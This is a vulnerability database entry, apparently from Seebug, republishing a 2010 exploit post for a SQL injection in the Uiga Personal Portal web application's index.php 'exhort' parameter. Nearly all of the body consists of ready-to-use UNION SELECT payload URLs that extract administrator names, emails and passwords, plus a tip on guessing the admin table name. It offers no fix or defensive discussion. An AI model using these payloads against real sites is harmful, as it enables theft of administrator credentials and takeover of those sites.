Uiga Personal Portal index.php (view) SQL Injection

2014-07-01T00:00:00
ID SSV:68435
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Uiga Personal Portal index.php (view) SQL Injection
Vulnerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Software Link :
http://www.scriptdevelopers.net/download/uigapersonalportal.zip
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork :
# Code :



Exploited Link :

http://[site]/uigaportal/index.php?view=ar_det&exhort=-36'

Examples :

http://[site]/product/demo/uigaportal/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,gr

oup_concat(admin_name,0x3a,admin_password),8,9,10,11+from+admin--

http://[site]/index.php?view=ar_det&exhort=-36+union+select+all+1,2,3,4,5,6,group_concat(admin_ema

il,0x3a,admin_password),8,9,10,11+from+tbl_admin--

Important: Sometimes the table name is administrators and sometimes its
admin